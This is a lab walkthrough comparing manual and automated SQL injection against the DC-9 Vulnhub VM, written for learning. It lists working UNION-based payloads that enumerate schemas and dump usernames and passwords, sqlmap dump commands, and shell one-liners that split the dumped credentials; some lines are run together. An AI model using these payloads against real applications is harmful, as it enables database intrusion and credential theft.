Manual vs automatic testing for SQL injection
Overview
An SQL injection attack consists of insertion or “injection” of a SQL query via the input data from the client to the application.
A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL commands.
Manual vs automatic testing
Manual testing consist of using SQL queries to generate errors or bypass SQL the intended execution of the commands.
While automatic testing consists of using same principles but using automated tools, and the go-to tools in SQLi is SQLMap
Note:
SQLMap is not allowed in some certification’s exams such as the OSCP, but even if you used them outside of an exam, you need to know what is happening behind the scenes.
Application
We used DC-9 VM from Vulnhub, which contains a search page that is vulnerable to SQLi.
You can download the VM from here to follow along with me.
Nb: you can use the browser or burp to perform these tests
1> Manual Testing
1. Find numbers of columns in the table
repeat this input until you get a response from the server
' UNION SELECT 1 #
' UNION SELECT 1,2 #
' UNION SELECT 1,2,3 #
' UNION SELECT 1,2,3,4,... #
' UNION SELECT 1,2,3,4,5,6 #
2. Find DB version: (@@version)
' union select 1,2,3,4,5,@@version #
3. Find DB names (concat(schema_name))
' union select 1,2,3,4,5,concat(schema_name) FROM information_schema.schemata #
4. Find tables names (concat(TABLE_NAME))
A/ DB=Staff
' union SELECT 1,2,3,4,5,concat(TABLE_NAME) FROM information_schema.TABLES WHERE table_schema='Staff' #
B/ DB=users
' union SELECT 1,2,3,4,5,concat(TABLE_NAME) FROM information_schema.TABLES WHERE table_schema='users' #
5. Find the columns name of a table: (information_schema.columns)
A/ TABLE=StaffDetails
' union SELECT 1,2,3,4,5,column_name FROM information_schema.columns WHERE table_name = 'StaffDetails' #
B/ TABLE=Users
' union SELECT 1,2,3,4,5,column_name FROM information_schema.columns WHERE table_name = 'Users' #
C/ TABLE=UserDetails
' union SELECT 1,2,3,4,5,column_name FROM information_schema.columns WHERE table_name = 'UserDetails' #
Results:
Number of columns: 6
DB version: 10.3.17-MariaDB-0+deb10u1
Databases — Tables — Columns:
information_schema (default)
Staff:
— — StaffDetails:
— — — — id
— — — — firstname
— — — — lastname
— — — — position
— — — — phone
— — — — reg_date
— — Users:
— — — — UserID
— — — — Username
— — — — Password
users:
— — UserDetails:
— — — — id
— — — — firstname
— — — — lastname
— — — — username
— — — — password
— — — — reg_date
6. Dump Data: (group_concat(username,” | “,password))
' union select 1,2,3,4,5,group_concat(username," | ",password) From users.UserDetails #
cat creds | tr "," "\n" | cut -d " " -f 1 > user
cat creds | tr "," "\n" | cut -d " " -f 3 > pass' union select 1,2,3,4,5,group_concat(username," | ",password) From Staff.Users #
2> Automatic Testing
Let’s capture the request using burp
Copy past the full request to a file on your Kali machine and run sqlmap on it
sqlmap -r request --dump --batch --dbs
sqlmap -r request --dump --batch --dbs -D Staff
sqlmap -r request --dump --batch --dbs -D users
I copied this to a file named creds
cat creds| cut -d "|" -f 6 | cut -d " " -f 2 > user
cat creds| cut -d "|" -f 4 | cut -d " " -f 2 > passuse sed -i “Nd” with n line number to delete lines
> > > Same Results ! ! !